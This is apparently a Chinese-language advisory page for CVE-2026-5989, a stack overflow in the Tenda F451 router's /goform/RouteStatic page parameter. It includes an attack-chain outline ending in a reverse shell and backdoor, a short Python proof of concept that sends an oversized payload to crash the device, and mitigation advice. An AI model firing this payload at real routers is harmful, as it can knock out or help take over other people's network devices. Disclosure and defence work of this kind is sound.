CVE-2026-5989 CVSS 8.8 高危

CVE-2026-5989 Tenda F451路由器栈溢出漏洞

披露日期: 2026-04-10

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5989

漏洞类型

栈缓冲区溢出

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Tenda F451

漏洞概述

Tenda F451路由器1.0.0.7版本存在严重安全漏洞，位于/goform/RouteStatic接口的fromRouteStatic函数中。由于未正确处理用户输入的page参数，导致发生栈缓冲区溢出。攻击者无需用户交互即可远程发起攻击，利用该漏洞可执行任意代码，造成设备信息泄露、数据篡改及服务拒绝，对系统安全构成严重威胁。

技术细节

该漏洞根因在于Tenda F451路由器固件中/goform/RouteStatic处理函数对输入参数page的边界检查缺失。当攻击者向该接口发送特制的HTTP请求，并在page参数中注入超长字符串时，程序未进行长度校验即直接使用不安全的拷贝函数（如strcpy）将数据复制到栈缓冲区。这导致数据溢出并覆盖栈上的返回地址或基址指针等关键内存区域。鉴于CVSS向量显示攻击复杂度低且无需用户交互，攻击者可精心构造Payload，通过覆盖返回地址劫持控制流，使其跳转至预设的Shellcode或ROP链。最终，这将导致设备以最高权限执行任意代码，攻击者可完全接管路由器控制权，植入后门或窃敏数据。

攻击链分析

STEP 1

1. 信息收集

扫描网络识别Tenda F451路由器设备，确认其固件版本为1.0.0.7。

STEP 2

2. 漏洞利用

向/goform/RouteStatic接口发送特制的HTTP POST请求，在page参数填充超长恶意数据。

STEP 3

3. 触发溢出

由于缺乏边界检查，超长数据覆盖栈上的返回地址，导致程序崩溃或控制流劫持。

STEP 4

4. 代码执行

CPU跳转至攻击者控制的Shellcode或ROP链，以Root权限执行任意系统命令。

STEP 5

5. 后渗透

建立反弹Shell，植入后门程序，维持对路由器的持久控制或进行横向移动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_poc(target_ip):
    # Target endpoint
    url = f"http://{target_ip}/goform/RouteStatic"
    
    # Construct payload to trigger stack overflow
    # The specific size depends on the buffer limit, assuming a generic overflow size here
    buffer_size = 600 
    payload = "A" * buffer_size
    
    # Prepare data payload
    data = {
        "page": payload
    }
    
    try:
        print(f"[+] Sending payload to {target_ip}...")
        response = requests.post(url, data=data, timeout=5)
        
        # Check response status
        if response.status_code == 200:
            print("[+] Request sent successfully. Check device for crash or shell.")
        else:
            print(f"[-] Unexpected status code: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")

if __name__ == "__main__":
    target = "192.168.0.1" # Replace with actual target IP
    exploit_poc(target)

影响范围

Tenda F451 1.0.0.7

防御指南

临时缓解措施

建议用户立即升级Tenda F451路由器固件至最新版本。若暂无修复补丁，请务必关闭远程管理功能，仅在局域网内进行管理，并配置防火墙规则拦截对外部IP对/goform/RouteStatic路径的访问请求。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5989
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5989
3 Details https://www.cvedetails.com/cve/CVE-2026-5989/
4 VulDB https://vuldb.com/cve/CVE-2026-5989
5 Link https://github.com/Jimi-Lab/cve/issues/5
6 Link https://vuldb.com/submit/792858
7 Link https://vuldb.com/vuln/356543
8 Link https://vuldb.com/vuln/356543/cti
9 Link https://www.tenda.com.cn/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表